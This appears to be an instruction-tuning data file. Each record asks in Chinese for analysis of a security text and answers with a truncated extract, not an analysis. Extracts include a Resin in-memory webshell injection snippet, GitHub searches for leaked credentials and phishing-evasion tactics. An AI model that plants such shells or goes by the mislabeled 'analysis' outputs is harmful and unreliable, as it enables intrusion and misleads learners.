Enterprise  Globant - GitHub Enterprise Research Goals 6 IBM Security /  2022 IBM Corporation  Bring more attention to securing Source Code Management systems  Inspire future research on defending Source Code Management systems Attendee Takeaways 7 IBM Security /  2022 IBM Corporation  Learn about different attack scenarios against Source Code Management systems  Learn how to defend Source Code Management systems  Learn how to abuse Source Code Management systems via privileged and non-privileged context My Perspective 8 IBM Security /  2022 IBM Corporation I AM:  Current - Red Team Operator  Previous - Blue Teamer I AM NOT:  DevOps Engineer  Software Developer  System Administrator Source Code Management Systems IBM Security /  2022 IBM Corporation 9 10 IBM Security /  2022 IBM Corporation  Manages source code repositories  Allows multiple developers to work on code at same time  Supports integrations into other systems within DevOps pipeline What is a Sour", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicrosoft Edge MemGC Internals Henry Li,TrendMicro 2015/08/29 Agenda  Background  MemGC Internals  Prevent the UAF'S exploit  Weaknesses of MemGC Notes  Research is based on Windows 10 10041( edgehtml.dll, chakra.dll)  The latest windows versions( windows 10 10240) data structure there are some small changes Who am i?  A security research in TrendMicro CDC zero day discovery team.  Four years of experience in vulnerability & exploit research.  Research interests are browser 0day vulnerability analysis, discovery and exploit.  Twitter/Weibo:zenhumany Background  June 2014 IE introduce ISOLATE HEAP  July 2014 IE introduce DELAY FREE Background  Isolated Heap can bypass  Delay Free  Pointer to the free block remains on the stack for the entire period of time from the free until the reuse, can prevent UAF EXPLOIT  Other situation, can bypass Whats MemGC  Chakra GC use Concurrent Mark-Sweep (CMS) Managing Memory  Edge use the same data structures to mange DOM and DOMS supporting objects, called MemGC MemGC Internals  Data Structures  Algorithms MemGC Data Structures MemProtectHeap 0x000 m_tlsIndex :int 0x108 m_recycler :Recycler Recycler 0x026c m_HeapBlock32Map HeapBlock32Map 0x42bc m_HeapInfo :HeapInfo HeapInfo 0x4400 m_HeapBucketGroup[ 0x40] :HeapBucketGroup array 0x5544 m_LargeHeapBucket[ 0x20 ] :LargeHeapBucket array 0x5b44 m_lastLargeHeapBucket :LargeHeapBucket HeapBucketGroup HeapBucketGroup 0x154 0x000 m_HeapBucketT<SmallNormalHeapBlock> 0x044 m_HeapBucketT<SmallLeafHeapBlock> 0x080 m_HeapBucketT<SmallFinalizableHeapBlock> 0x0c8 m_HeapBucketT<SmallNormalWithBarrierHeapBlock> 0x10c m_HeapBucketT<SmallFinalizableWithBarrierHeapBlock> HeapBucketT<SmallNormalHeapBlock> HeapBucketT<SmallNormalHeapBlock> 0x04 size :int 0x0c m_SmallHeapBlockAllocator 0x20 pPartialReuseHeapBlockList 0x24 pEmptyHeapBlockList 0x28 pFullMarkedHeapBlockList 0x2c pPendingNewHeapBlockList SmallHeapBlockAllocator<SmallNormalHeapBlock> 0x00 endadderss 0x04 startaddress 0x08 pSmallNormalHeapblock ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nopenssl === 强大的安全套接字层密码库 ## 补充说明 **OpenSSL** 是一个强大的安全套接字层密码库囊括主要的密码算法常用的密钥和证书封装管理功能及SSL协议并提供丰富的应用程序供测试或其它目的使用在OpenSSL被曝出现严重安全漏洞后发现多数通过SSL协议加密的网站使用名为OpenSSL的开源软件包由于这是互联网应用最广泛的安全传输方法被网银在线支付电商网站门户网站电子邮件等重要网站广泛使用所以该漏洞影响范围广大 OpenSSL有两种运行模式交互模式和批处理模式 直接输入openssl回车进入交互模式输入带命令选项的openssl进入批处理模式 OpenSSL整个软件包大概可以分成三个主要的功能部分密码算法库SSL协议库以及应用程序OpenSSL的目录结构自然也是围绕这三个功能部分进行规划的 **对称加密算法** OpenSSL一共提供了8种对称加密算法其中7种是分组加密算法仅有的一种流加密算法是RC4这7种分组加密算法分别是AESDESBlowfishCASTIDEARC2RC5都支持电子密码本模式ECB加密分组链接模式CBC加密反馈模式CFB和输出反馈模式OFB四种常用的分组密码加密模式其中AES使用的加密反馈模式CFB和输出反馈模式OFB分组长度是128位其它算法使用的则是64位事实上DES算法里面不仅仅是常用的DES算法还支持三个密钥和两个密钥3DES算法 **非对称加密算法** OpenSSL一共实现了4种非对称加密算法包括DH算法RSA算法DSA算法和椭圆曲线算法ECDH算法一般用于密钥交换RSA算法既可以用于密钥交换也可以用于数字签名当然如果你能够忍受其缓慢的速度那么也可以用于数据加密DSA算法则一般只用于数字签名 **信息摘要算法** OpenSSL实现了5种信息摘要算法分别是MD2MD5MDC2SHASHA1和RIPEMDSHA算法事实上包括了SHA和SHA1两种信息摘要算法此外OpenSSL还实现了DSS标准中规定的两种信息摘要算法DSS和DSS1 **密钥和证书管理** 密钥和证书管理是PKI的一个重要组成部分OpenSSL为之提供了丰富的功能支持多种标准 首先OpenSSL实现了ASN.1的证书和密钥相关标准提供了对证书公钥私钥证书请求以及CRL等数据对象的DERPEM和BASE64的编解码功能OpenSSL提供了产生各种公开密钥对和对称密钥的方法函数和应用程序同时提供了对公钥和私钥的DER编解码功能并实现了私钥的PKCS#12和PKCS#8的编解码功能OpenSSL在标准中提供了对私钥的加密保护功能使得密钥可以安全地进行存储和分发 在此基础上OpenSSL实现了对证书的X.509标准编解码PKCS#12格式的编解码以及PKCS#7的编解码功能并提供了一种文本数据库支持证书的管理功能包括证书密钥产生请求产生证书签发吊销和验证等功能 事实上OpenSSL提供的CA应用程序就是一个小型的证书管理中心CA实现了证书签发的整个流程和证书管理的大部分机制 ### 实例 **1使用 openssl 生成密码** 几乎所有 Linux 发行版都包含 openssl我们可以利用它的随机功能来生成可以用作密码的随机字母字符串 ```shell openssl rand -base64 10 # nU9LlHO5nsuUvw== ``` nU9LlHO5nsuUvw== **2消息摘要算法应用例子** 用SHA1算法计算文件file.txt的哈西值输出到stdout ```shell # openssl dgst -sha1 file.txt ``` 用SHA1算法计算文件file.txt的哈西值输出到文件digest.txt ```shell # openssl sha1 -out digest.txt file.txt ``` 用DSS1(SHA1)算法为文件file.txt签名输出到文件dsasign.bin签名的private key必须为DSA算法产生的保存在文件dsakey.pem中 ```shell # openssl dgst -dss1 -sign dsakey.pem -out dsasign.bin file.txt ``` 用dss1算法验证file.txt的数字签名dsasign.bin验证的private key为DSA算法产生的文件dsakey.pem ```shell # openssl dgst -dss1 -prverify dsakey.pem -signature dsasign.bin file.txt ``` 用sha1算法为文件file.txt签名,输出到文件rsasign.bin签名的private key为RSA算法产生的文件rsaprivate.pe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nchsh === 用来更换登录系统时使用的shell ## 补充说明 **chsh命令** 用来更换登录系统时使用的shell若不指定任何参数与用户名称则chsh会以应答的方式进行设置 ### 语法 ```shell chsh(选项)(参数) ``` ### 选项 ```shell -s<shell 名称>或--shell<shell 名称>更改系统预设的shell环境 -l或--list-shells列出目前系统可用的shell清单 -u或--help在线帮助 -v或-version显示版本信息 ``` ### 参数 用户名要改变默认shell的用户 ### 实例 **查看系统安装了哪些shell的两种方法** 第一种 ```shell [rocrocket@localhost ~]$ chsh -l /bin/sh /bin/bash /sbin/nologin /bin/zsh ``` 第二种 ```shell [rocrocket@localhost ~]$ cat /etc/shells /bin/sh /bin/bash /sbin/nologin /bin/zsh ``` 其实`chsh -l`也是来查看这个文件 **查看当前正在使用的shell** ```shell [rocrocket@localhost ~]$ echo $SHELL /bin/bash ``` 注意SHELL一定要是大写可以看到目前使用的shell是`/bin/bash` **把我的shell改成zsh** ```shell [rocrocket@localhost ~]$ chsh -s /bin/zsh Changing shell for rocrocket. Password: Shell changed. [rocrocket@localhost ~]$ ``` 使用chsh加选项`-s`就可以修改登录的shell了你会发现你现在执行`echo $SHELL`后仍然输出为`/bin/bash`这是因为你需要重启你的shell才完全投入到zsh怀抱中去`chsh -s`其实修改的就是`/etc/passwd`文件里和你的用户名相对应的那一行现在来查看下 ```shell [rocrocket@localhost ~]$ cat /etc/passwd|grep rocrocket rocrocket:x:500:500:rocrocket,China:/rocrocket/PSB/home:/bin/zsh ``` 你可以发现输出内容的最后部分已经变成了`/bin/zsh`了下次重启的时候linux就会读取这一命令来启动shell了 **把shell修改回/bin/bash** ```shell [rocrocket@localhost ~]$ chsh -s /bin/bash Changing shell for rocrocket. Password: Shell changed. ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: HTTP Status Code background: bg-[#3b7dc0] date: 2020-12-26 16:09:09 tags: - response - server categories: - Other intro: | The http status codes cheat sheet. a quick reference to every HTTP status code. plugins: - tooltip --- HTTP Status code ----------- ### Means - [1xx: Informational](#1xx-information){data-tooltip=\"It means the request has been received and the process is continuing.\"} - [2xx: Success](#2xx-successful){data-tooltip=\"It means the action was successfully received, understood, and accepted.\"} - [3xx: Redirection](#3xx-redirection){data-tooltip=\"It means further action must be taken in order to complete the request.\"} - [4xx: Client Error](#4xx-client-error){data-tooltip=\"It means the request contains incorrect syntax or cannot be fulfilled.\"} - [5xx: Server Error](#5xx-server-error){data-tooltip=\"It means the server failed to fulfill an apparently valid request.\"} ### 2xx. Successful {.row-span-2} * [200: OK](https://tools.ietf.org/html/rfc7231#section-6.3.1){data-tooltip=\"The request is OK.\"} * [201: Created](https://tools.ietf.org/html/rfc7231#section-6.3.2){data-tooltip=\"The request is complete, and a new resource is created .\"} * [202: Accepted](https://tools.ietf.org/html/rfc7231#section-6.3.3){data-tooltip=\"The request is accepted for processing, but the processing is not complete.\"} * [203: Non-Authoritative Information](https://tools.ietf.org/html/rfc7231#section-6.3.4){data-tooltip=\"The information in the entity header is from a local or third-party copy, not from the original server.\"} * [204: No Content](https://tools.ietf.org/html/rfc7231#section-6.3.5){data-tooltip=\"A status code and a header are given in the response, but there is no entity-body in the reply.\"} * [205: Reset Content](https://tools.ietf.org/html/rfc7231#section-6.3.6){data-tooltip=\"The browser should clear the form used for this transaction for additional input.\"} * [206: Partial Content](https://tools.ietf.org/html/rfc7233#section-4.1){data-tooltip=\"The serv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nC艹学习笔记 本笔记主干基于书籍C艹面向对象程序设计教程(第4版)在此基础上会有所扩展 内容如有不对之处希望大家能够指出并私信我 我的个人博客https://www.kn0sky.com/ Web版笔记https://wiki.kn0sky.com/#/note_cpp/README 第一章面向对象程序设计概述 面向过程与面向对象 面向过程程序设计的主要特征是程序由 过程定义 和 过程调用 组成 程序 = 过程 + 调用 面向对象程序设计的主要特征是程序由类的定义和类的使用组成一切消息由向对象发送消息来实 现对象收到消息启动相关方法来完成 程序 = 对象 + 消息 面向对象程序设计基本概念 对象对象由数据和操作代码组成 类类是一组对象的抽象 再程序设计中先声明类再声明对象 消息与方法对象收到消息调用相应的方法 面向对象程序设计基本特征 1. 抽象类是对象的抽象对象是类的实例抽象分为数据抽象和代码抽象对应属性与方法 2. 封装把方法用函数包起来使用的时候只需要知道需要的参数提供了代码的重用性 3. 继承继承分为单继承和多继承子类从单个或多个父类继承数据和方法同时又与父类有所差别 4. 多态不同对象收到相同的消息时执行不同的操作 第二章C++概述 C++语言的特点全面兼容C并对C进行了扩充 注释行 C++有两种注释方式 //单行注释 /*多 行 注 释*/ 多行注释可以嵌套单行注释( // )的注释方式 C++ 的输入输出 C++ 除了可以使用C语言中使用的 scanf()  printf() 函数进行输入输出还增加了使用标准输入流 对象 cin 和标准输出流对象 cout 来进行 程序示例 cin反汇编程序 cout反汇编程序 #include<iostream> using namespace std; int main(){ int a; cin >> a; cout << a; return 0; } int a; cin >> a; 006718D2 mov esi,esp ;这里将esp栈顶指针放入esi存起来 006718D4 lea eax,[a] 006718D7 push eax ;取变量a的地址放入栈中 006718D8 mov ecx,dword ptr [_imp_?cin@std@@3V?$basic_istream@DU? $char_traits@D@std@@@1@A (067B0ACh)] 006718DE call dword ptr [__imp_std::basic_istream<char,std::char_traits<char> >::operator>> (067B098h)] ;这里把一个地址的值放到了ecx里函数调用之后我们输入数值数值会存到那个地址里从而使ecx里的 值变成了我们输入的结果 006718E4 cmp esi,esp 006718E6 call __RTC_CheckEsp (0671235h) ;对比当前栈和函数调用之前是否有变化检查堆栈平衡 cout << a; 005447BB mov esi,esp ;存栈顶 005447BD mov eax,dword ptr [a] 005447C0 push eax ;变量a入栈 005447C1 mov ecx,dword ptr [_imp_?cout@std@@3V?$basic_ostream@DU? $char_traits@D@std@@@1@A (054B0B0h)] ;不懂可能是存储打印是否成功的 运算符 >> , << 仍然保持C语言中右移左移的功能再用于输入输出时进行了扩充 cin , cout 运行 用户输入和输出一连串数据示例 输入需要使用空白符进行分隔空格TAB回车都行 输出会从左到右进行输出 示例反汇编 005447C7 call dword ptr [__imp_std::basic_ostream<char,std::char_traits<char> >::operator<< (054B0A4h)] ;函数调用打印变量的值 005447CD cmp esi,esp 005447CF call __RTC_CheckEsp (0541235h) ;堆栈平衡检查 return 0; #include<iostream> using namespace std; int main(){ int a, b, c; cin >> a >>b >> c; cout << a + b << c; return 0; } 1 2 3 33 int a, b, c; cin >> a >>b >> c; 00031882 mov esi,esp 00031884 lea eax,[c] 0003", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n无文件马 Resin 3.x WebApp Filter 基于 addFilterMapping Servlet 基于 addServletMapping Resin 3.x & 4.x Filter 无文件马 Resin 3.x 内存马相关实现本地测试版本resin v3.1.16 WebApp 当前代码运行时上下文环境 配置 web.xml com.example.general.ServletShell#doGet 方法处断点获得相关的调用栈如下 逐步分析 com.caucho.server.dispatch.ServletInvocation 成员方法 getContextRequest() <servlet> <servlet-name>ServletShell</servlet-name> <servlet-class>com.example.general.ServletShell</servlet-class> </servlet> <servlet-mapping> <servlet-name>ServletShell</servlet-name> <url-pattern>/index</url-pattern> </servlet-mapping> com.caucho.server.http.HttpRequest 继承自 com.caucho.server.connection.AbstractHttpRequest 成员方法 getWebApp() com.caucho.server.webapp.Application 继承自 com.caucho.server.webapp.WebApp 向上转换upcasting方便调用父类(WebApp)中定义的方法和变量 Object currentRequest = this.getClass().getMethod(\"getContextRequest\").invoke(null); currentRequest.getClass() -> com.caucho.server.http.HttpRequest currentRequest.getClass().getMethod(\"getWebApp\").invoke(currentReque st) -> com.caucho.server.webapp.Application WebApp webApp = (WebApp)currentRequest.getClass().getMethod(\"getWebApp\").invoke(curr entRequest); 可成功获取到当前web context(WebApp) com.caucho.server.webapp.WebApp 需要关注的成员方法 Filter Listener Servlet 至此针对不同类型的内存马调用相关的成员方法注入即可 获取WebApp(当前上下文)的代码实现 运行时截图 Filter 基于 addFilterMapping addFilterMapping com.caucho.server.webapp.WebApp#addFilterMapping ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); Class servletInvocation = classLoader.loadClass(\"com.caucho.server.dispatch.ServletInvocation\"); Object currentRequest = servletInvocation.getMethod(\"getContextRequest\").invoke(null); WebApp webApp = (WebApp)currentRequest.getClass().getMethod(\"getWebApp\").invoke(currentRequest); Filter 示例 Filter 配置 常用的方法就是先在web.xml中定义1个 filter demo然后断点查看相关配置参数 _filterName _filterClassName _filterClass _urlPattern ... 注入思路 获取当前环境的WebApp(上下文) 构造filterMapping添加 相关配置 调用成员方法addFilterMapping添加该filterMapping即可 代码实现 filterMapping.setFilterClass(); filterMapping.setFilterName(); Filter", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYou're Leaking Trade Secrets D E F C O N 2 2 You're Leaking TRADE SECRETS You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets Michael Schrenk You're Leaking Trade Secrets You're Leaking Trade Secrets twitter: @mgschrenk facebook: facebook.com/webbots You're Leaking Trade Secrets This is a story about Organizational Privacy You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets Individuals unintentionally leak identity Organizations unintentionally leak trade secrets You're Leaking Trade Secrets Individuals unintentionally leak identity Organizations unintentionally leak trade secrets You're Leaking Trade Secrets Spoiler Alert: Not all online information is: Read by the intended audience Used as intended You're Leaking Trade Secrets Spoiler Alert: Not all online information is: Read by the intended audience Used as intended You're Leaking Trade Secrets Individuals are aware of the need for personal privacy Organizations are less aware of the need for organizational privacy You're Leaking Trade Secrets Individuals are aware of the need for personal privacy Organizations are less aware of the need for organizational privacy You're Leaking Trade Secrets The difference in awareness is largely due to the media, and how they cover privacy stories You're Leaking Trade Secrets Articles on Trade Secrets only focus on crimes These stories focus on news but don't teach lessons You're Leaking Trade Secrets Personal privacy stories create many customers for a host of advertisers You're Leaking Trade Secrets Personal privacy stories create great content You're Leaking Trade Secrets Personal privacy stories create great content Mama and Papa... won the case against Gulliver. Gulliver is now officially paying for my vacation to Europe this summer. S*CK IT.  You're Leaking Trade Secrets Personal privacy stories create great content ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTiming Attacks in Low-Latency Mix Systems (Extended Abstract) Brian N. Levine1, Michael K. Reiter2, Chenxi Wang2, and Matthew Wright1 1 University of Massachusetts, Amherst, MA, USA; {brian,mwright}@cs.umass.edu 2 Carnegie Mellon University, Pittsburgh, PA, USA; {reiter,chenxi}@cmu.edu Abstract. A mix is a communication proxy that attempts to hide the correspondence between its incoming and outgoing messages. Timing attacks are a significant challenge for mix-based systems that wish to support interactive, low-latency applications. However, the potency of these attacks has not been studied carefully. In this paper, we investigate timing analysis attacks on low-latency mix systems and clarify the threat they pose. We propose a novel technique, defensive dropping, to thwart timing attacks. Through simulations and analysis, we show that defensive dropping can be effective against attackers who employ timing analysis. 1 Introduction A mix [6] is a communication proxy that attempts to hide the correspondence between its incoming and outgoing messages. Routing communication through a chain of mixes is a powerful tool for providing unlinkability of senders and receivers despite observation of the network by a global eavesdropper and the corruption of many mix servers on the path. A mix can use a variety of tech- niques for hiding the relationships between its incoming and outgoing messages. In particular, it will typically transform them cryptographically, delay them, reorder them, and emit additional dummy messages in its output. The effec- tiveness of these techniques have been carefully studied (e.g., [4, 12, 18, 15,13]), but mainly for high-latency systems, e.g., anonymous email or voting applica- tions that do not require efficient processing. In practice, such systems may take hours to deliver a message to its intended destination. Users desire anonymity for more interactive applications, such as web brows- ing, online chat, and file-sharing, all of which require a low-lat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMimicry: An Introduction By Mystic What is Mimicry?  The ability to survive by mimicking surroundings What is Mimicry?  The ability to survive by mimicking surroundings  Visibility of encryption What is Mimicry?  The ability to survive by mimicking surroundings  Visibility of encryption  Grammar filtering to find encrypted data Peter Wayners Mimic Functions  A way to encrypt/hide data in which the output is statistically and grammatically sound Peter Wayners Mimic Functions  A way to encrypt/hide data in which the output is statistically and grammatically sound  Generates text using the syntax described in a Context Free Grammar (CFG) and hides data by the choices it makes Context Free Grammars  A way of describing language Context Free Grammars  A way of describing language  Uses  Terminals: Words and phrases that are static Context Free Grammars  A way of describing language  Uses  Terminals: Words and phrases that are static  Variables: Places where decisions can be made Context Free Grammars  Productions: describes how a variable can be converted into different sets of variables or terminals Context Free Grammars  Productions: describes how a variable can be converted into different sets of variables or terminals  Example of a production: variable ---> phrase || words Context Free Grammar  Example of a CFG: Start ---> noun verb noun ---> Fred || Barney || Fred and Barney verb ---> went fishing. || went bowling. How Data is Hidden  Mimic generates a binary tree based on the possibilities in a context free grammar How Data is Hidden  Mimic generates a binary tree based on the possibilities in a context free grammar  It then chooses the leaves that would encode the right bits How Data is Hidden  Given the fallowing CFG: Start ---> noun verb noun ---> Fred || Barney verb ---> went fishing where || went bowling where where ---> in direction Iowa. || in direction Minnesota. direction ---> northern || southern How Data is Hidden  Bits to be hidden: 1010 Start ---> noun", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGithub Security n|u - The Open security community Chennai Meet Presenter : Vinothkumar Date : 27/04/2019 About Me Application security engineer @ Freshworks, Inc. Blogger @ https://tutorgeeks.blogspot.com Tweet @vinothpkumar Github @ https://github.com/tutorgeeks Agenda for the session 1. What is Github 2. Using Github / Github Gist search for bug bounty hunting 3. Securing Wiki 4. Securing Forked repos 5. Security Audit log 6. Post commit security check using Gitrob 7. Pre commit security check using Git Secrets 8. Github security best practises 1.What is Github  GitHub is a code hosting platform for collaboration and version control.  GitHub lets you (and others) work together on projects.  28 million users and 57 million repositories making it the largest host of source code in the world.  Parent company : Microsoft (2018present)  Written in Ruby Git Cheat Sheet 2.Using Github search for bug bounty hunting Github is a great place to look for credentials and private API keys. Heres a list of a few items that you could use to find information about your target.  example.com API_key  example.com secret_key  example.com aws_key  example.com Password  example.com FTP  example.com login  example.com github_token PayTM paytm.com  password Bounty awarded : Rs.21200 Status : Fixed https://twitter.com/s4thi5h_infosec/status/1067004873663639552 Snapchat Bounty hunter Th3G3nt3lman was awarded $15,000 after discovering and reporting a sensitive auth token that was accidentally posted by a Snapchat software engineer. https://medium.com/@cosmobugbounty/bounty-of-the-week-15-000-snapchat-leak-af38f882d3ac Search Github Gist [ Mostly Ignored ] GitHub Gist is used instantly share code, notes, and snippets.  Helps to create public and secret gist.  Secret gist is only protected by a token. Use with caution while creating secret gist since developer could paste the secret gist public along with the token. site:gist.github.com companyname Zomato - Mandate 2FA  Zomatos Github org was ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRocking the pocket book: Hacking chemical plants for competition and extortion Marina Krotofil Jason Larsen WHITE PAPER, DEFCON 23 FURTHER CO-AUTHORS AND CONTRIBUTORS: Alexander Isakov  Alexander Winnicki  Dieter Gollmann  Pavel Gurikov DAMN VULNERABLE CHEMICAL PROCESS https://github.com/satejnik/DVCP-VAC  https://github.com/satejnik/DVCP-TE This research was done in Hamburg University of Technology, Hamburg, Germany. August 2015 Contents 1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.1 Process Control Systems 6 2 Classes of Cyber-Physical Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 2.1 Equipment damage 9 2.2 Production damage 9 2.3 Compliance violation 9 3 Stages of Cyber-Physical Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.1 Access 11 3.2 Discovery 12 3.3 Control 13 3.4 Damage 13 3.5 Cleanup 14 4 Vinyl Acetate Monomer Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 4.1 Process Description 15 4.2 Control Model 17 4.3 Simulation of Attacks 17 4 5 Attack for Production Damage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 5.1 Preliminary Analysis 20 6 Attaining Attack Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 6.1 Access 21 6.2 Discovery 21 6.3 Control 22 6.4 Damage 25 6.5 Cleanup 28 6.6 Discussion 31 7 Damn Vulnerable Chemical Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 7.1 Framework description 34 7.2 Comparison of TE and VAM processes 38 7.3 Potential applications 39 8 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 1. Introduction Advances in computing and networking have added new capabilities to physical systems that could not be fe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Message of the Day PWN ## Description: > From the OffHub router, you jump onto the Google-Haus smart hub. This fully feature assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available as a premium subscription service paid monthly. A binary file was attached. ## Solution: The service allows us to set and get the \"message of the day\" for the user. Setting and getting the message for the admin is not allowed: ```console root@kali:/media/sf_CTFs/google/message/1# nc motd.ctfcompetition.com 1337 Choose functionality to test: 1 - Get user MOTD 2 - Set user MOTD 3 - Set admin MOTD (TODO) 4 - Get admin MOTD 5 - Exit choice: 2 Enter new message of the day New msg: Test Message New message of the day saved! Choose functionality to test: 1 - Get user MOTD 2 - Set user MOTD 3 - Set admin MOTD (TODO) 4 - Get admin MOTD 5 - Exit choice: 1 Test Message Choose functionality to test: 1 - Get user MOTD 2 - Set user MOTD 3 - Set admin MOTD (TODO) 4 - Get admin MOTD 5 - Exit choice: 3 TODO: Allow admin MOTD to be set Choose functionality to test: 1 - Get user MOTD 2 - Set user MOTD 3 - Set admin MOTD (TODO) 4 - Get admin MOTD 5 - Exit choice: 4 You're not root! Choose functionality to test: 1 - Get user MOTD 2 - Set user MOTD 3 - Set admin MOTD (TODO) 4 - Get admin MOTD 5 - Exit choice: 5 ``` Let's take a look at the binary: ``` root@kali:/media/sf_CTFs/google/message/1# r2 motd -- Quantum dissasemble: it's there as long as you don't observe it [0x60606060]> aaaa [WARNING: r_bin_get_vaddr: assertion 'bin && paddr != UT64_MAX' failed (line 1382) WARNING: r_bin_get_vaddr: assertion 'bin && paddr != UT64_MAX' failed (line 1382) [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Constructing a function name for fcn.* and sym.func.* functions (aan) [x] En", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModern Initial Access and Evasion Tactics Red Teamers Delight Mariusz Banach Red Team Operator at ING Tech Poland @mariuszbit, github/mgeeky beacon> whoami Agenda  A Few Phishing Tricks  Initial Access in 2022  Typical Vectors  Rise of Containerized Malware  The Beauty of HTML Smuggling  Evasion In-Depth  Delivery  Exploitation  Installation  Command & Control  Exfiltration Disclaimer  Initial Access & Evasion tactics effectiveness is very Company/vendor specific  Quite hard to maintain absolute 0% detection rate in Mature, Highly Secured Environments  No fancy new tactics in this Talk :<  This talk shares my insights based on engagements delivered with following security stacks:  MDE, MS Defender For Endpoint + ATP  MDO, MS Defender For Office365  MDI, MS Defender For Identity  McAfee AV  CrowdStrike Falcon EDR  Palo Alto Proxy  BlueCoat Proxy PHISHING  Stay away of regular e-mail exchanges  Stick more to Third-Party communication channels (LinkedIn, Chat, Contact Forms)  Develop multi-step plausible pretexts  CV/Resume in response to a real Job Offer, Customer Inquiry  Investor Relations (IR) exchange leading to IPO/bonds/shares acquisition  Social Marketing offering  Bonkers tricks:  Ride-to-Left-Override-Like-Its-90s  This E-mail was scanned.[] No Spam detected. Links are safe to open. Phishing  Get familiar with state-of-the-art Detections  Here we reverse-engineer 20+  MS Defender for Office365 Anti-Spam rules Phishing  Apply Phishing e-mail HTML Linting  On embedded URLs domain  MS Defender for O365 ATP: Safe Links  Categorisation, Maturity, Prevalence, Certificate CA signer (Lets Encrypt is a no-go)  Domain Warm Up  Landing Page specific  Anti-Sandbox / Anti-Headless  HTML Smuggling <3  Keep your URL contents benign  Beware of ?id= , ?campaign=, ?track=, /phish.php?sheep=  Number of GET params, their names & values DO MATTER Phishing  Apply Phishing e-mail HTML Linting Phishing  Email Sending Strategy  MS Defender for Office365 cools down a sender upon 4-5th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNinjaTV - Increasing Your Smart TVs IQ Without Bricking It Felix Leder D About Myself  Passion:  Reverse Engineering (+ tool development)  Being out in the snow, being out on a bike, being out in the water  Fun Projects:  Bug hunting in malware  Botnet takeovers and countermeasure  The Honeynet Project  $$$ Job:  Mobile Threat Research @ Blue Coat Norway Credits Western Digital TV (Live Hub) Inside Motivation to get other TV stations Offline Analysis 1 Drive Investigation  WDTVPriv partition  Hauppauge TV app storage  Spotify offline storage  Last update pkg  WDTVLiveHub  Main media  Swap Offline Analysis 2 Updates Update contents felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 e0 01 00 62 bb e4 51 b4 1b 06 08 01 |.......b..Q.....| 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 ", "category": "text_analysis", "source": "security_papers"}
